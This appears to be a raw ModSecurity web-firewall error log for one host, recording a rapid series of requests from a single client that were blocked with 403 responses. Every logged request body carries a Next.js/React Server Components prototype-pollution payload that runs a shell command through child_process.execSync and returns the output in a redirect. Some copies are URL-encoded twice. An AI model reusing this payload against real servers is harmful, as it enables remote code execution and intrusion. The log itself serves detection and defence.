[rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmzYRhslBlnapNAUOXlgAAAAc"] [Sun Apr 05 15:42:37.975680 2026] [:error] [pid 1306:tid 1330] [client 172.94.9.253:44536] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzYRhslBlnapNAUOXlQAAAA0"] [Sun Apr 05 15:42:38.007649 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:44622] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzpc83uMXRUE9zvQTHQAAAcM"] [Sun Apr 05 15:42:38.042140 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:44638] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzpc83uMXRUE9zvQTHgAAAdM"] [Sun Apr 05 15:42:38.061765 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:44658] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzrxQSOrq_iRTM7dp-gAAAQ4"] [Sun Apr 05 15:42:38.075732 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:44672] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmzrxQSOrq_iRTM7dp_wAAAQQ"] [Sun Apr 05 15:42:38.078389 2026] [:error] [pid 1503:tid 1511] [client 172.94.9.253:44678] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzkI7AjfUQYCN-J7DuAAAAMI"] [Sun Apr 05 15:42:38.082036 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:44692] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzpc83uMXRUE9zvQTIAAAAcE"] [Sun Apr 05 15:42:38.086486 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:44652] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzrxQSOrq_iRTM7dp_gAAARg"] [Sun Apr 05 15:42:38.097488 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:44698] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzrxQSOrq_iRTM7dqAAAAAQo"] [Sun Apr 05 15:42:38.104181 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:44694] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzrxQSOrq_iRTM7dp_QAAAQM"] [Sun Apr 05 15:42:38.104327 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:44702] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmzrxQSOrq_iRTM7dp_AAAAQ0"] [Sun Apr 05 15:42:38.144858 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:44712] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzrxQSOrq_iRTM7dqAQAAAQM"] [Sun Apr 05 15:42:38.175112 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:44784] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzrxQSOrq_iRTM7dqAwAAAQY"] [Sun Apr 05 15:42:38.179193 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:44726] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzrxQSOrq_iRTM7dqAgAAAQU"] [Sun Apr 05 15:42:38.200612 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:44744] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzpc83uMXRUE9zvQTIQAAAc0"] [Sun Apr 05 15:42:38.201997 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:44728] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmzrxQSOrq_iRTM7dqBgAAAQI"] [Sun Apr 05 15:42:38.204869 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:44790] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzpc83uMXRUE9zvQTIgAAAdg"] [Sun Apr 05 15:42:38.205867 2026] [:error] [pid 1503:tid 1513] [client 172.94.9.253:44750] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzkI7AjfUQYCN-J7DuQAAAMQ"] [Sun Apr 05 15:42:38.214781 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:44788] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 